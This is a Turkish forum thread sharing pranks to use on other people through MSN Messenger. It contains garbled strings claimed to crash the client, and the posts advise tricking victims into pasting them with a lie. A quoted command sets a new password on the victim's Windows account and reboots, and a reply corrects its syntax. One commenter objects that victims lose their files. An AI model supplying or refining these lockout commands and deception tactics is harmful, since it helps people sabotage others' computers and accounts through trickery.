Msnden Karsıya Verilebilecek Zararlar(programsız)

ΜεтάĻïڪţ

^_^-/!ηєω ѕнι&#10
:D Ama gerçekten ben denedim şifre değiştirmeyi çalışmadı sadece res attı ama emeğine sağlık....

archon2

New member
Teşekkürler...

umut_38

New member
SAOL KARDEŞ Darwinin teori gerçek, Bush apes bunu msnin birinde denedim bi daha acılmamıstı

Harder_Gm

New member
!..Msn'den karşı Pc'ye yapabileceeğiniz birsürü şey

7)Şimdi size vereceğim kodlar sayesinde karşı tarafın msn ini patlatabilirsiniz.ancak verceğim bu kodları

1)ñ¯a_Á¯aÿ±m¯a?ÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ ÑÇ á£áÇá
2)Darwinin teori gerçek, Bush apes

bu kodları karşı tarafın ileti bolumune yazdırmaya çalışın (yazarsan mail in gorunmez oluyo )felan diyip kandırıp yazdırın yazdığı anda patlıyo

Şimdilik aklıma bu kadar geliyo..!Diğerlerini de hatırladıkça sizlere yazıcam..!

EMEĞE SAYGI EMEĞE SAĞLIK B TEŞEKÜR HOR GÖRÜLMEZ UMARIM:victory
Arkadaşım Öncelikle Sağoll Dierlerini Bilmem Ama Bu Pek İşe Yaramıo Sadece O Bilgisayarda Msn Sini Açamıo Dışarıda Açabiliyor Genede Çok Sağoll

D@rk

New member
7 numaralı konu işe yaramıyor sanırım diğerleri yarıyor

ranger_24

New member
"3)Karşı Pc'ye şifre koymak:
İlk önce not defterini açıyoruz ardından

netuser %username% mustymusty
shutdown -r"

burda netuser birlesik deil ayri olcak sanirim.. "net user" console'da bilgisayardaki kulllanicilari gosterir ama "netuser" diye bisi yok maalesef

cuteftp

New member
Karsindakine Gıcıkmı Oldun Bu Dediklerimi Uygula.arkadasın sana bişimi dedi hemen gönder

Bak Garanti Veriyom Bi gün Çok Lazım Olur.:melek
Hmm... Ben de diyorum bu konuda neden yardım istiyorlar. Adamlar kendi msn adresiyle neden Messenger açamıyor. Demek ki bu tür insanlar yüzünden.

Kardeşim yapmayın böyle şeyler. Çözüm yollarını da yazsaydın da sonra barışınca lazım olur.

Adam sonra bu sorunu nasıl düzeltebileceğini yazıyor foruma. Altındaki yorum aynen şu.

"Format at gitsin." Sonra adam dosyalarından da oluyor. Bu iyi bir şey mi sence?

Ayrıca aklına gelenin bu olduğunu da sanmıyor. Kopyaladıkların bu kadar bence.